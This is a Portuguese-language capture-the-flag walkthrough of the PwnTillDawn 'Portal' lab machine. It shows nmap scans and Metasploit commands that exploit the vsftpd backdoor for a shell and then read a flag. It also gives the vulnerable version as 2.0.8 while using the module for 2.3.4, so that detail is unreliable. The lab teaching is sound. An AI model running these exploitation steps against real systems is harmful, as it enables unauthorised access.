Portal — PwnTillDawn (Easy)
Writeup: Portal
Neste writeup, vou explorar a resolução da máquina Portal, disponível na plataforma PwnTillDawn. A PwnTillDawn é uma excelente plataforma online projetada para aprimorar habilidades em hacking ético e testes de penetração, oferecendo diversos cenários práticos para estudantes e profissionais de segurança cibernética. A máquina Portal possui classificação “Fácil”, sendo ideal para iniciantes que desejam praticar técnicas fundamentais de pentesting em um ambiente controlado e educativo.
Reconhecimento
Iniciei com um scan de todas as portas para identificar o que estava exposto:
1
sudo nmap -sS -p- <IP-do-Alvo>
Esse scan revelou que as portas 21 (FTP) e 22 (SSH) estavam abertas.
Em seguida, rodei um segundo scan mais focado, para trazer detalhes sobre os serviços:
1
sudo nmap -sV -p21,22 -sC -A <IP-do-Alvo>
Esse comando trouxe banners, versões e possíveis scripts de exploração automática.
O serviço vsftpd chamou a atenção, pois está em uma versão antiga, conhecida por conter um backdoor.
Exploração
Com base na versão identificada (vsftpd 2.0.8), utilizei o Metasploit para tentar um exploit público:
1
2
3
4
5
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <IP-do-alvo>
set RPORT 21
exploit
Na primeira tentativa, a exploração falhou:
Segunda Tentativa - Sucesso
Tentei novamente, e dessa vez obtive sucesso. O Metasploit abriu uma shell com o usuário ftp.
Capturando a Flag
Com shell interativa, capturei a flag utilizando o comando cat para exibir o conteúdo:
1
2
ls
cat FLAG1.txt
Conclusão
A máquina foi resolvida explorando uma falha pública do serviço vsftpd, que permitia acesso não autorizado por meio de um backdoor.
Esse é um ótimo exemplo de como softwares desatualizados podem comprometer totalmente a segurança de um sistema.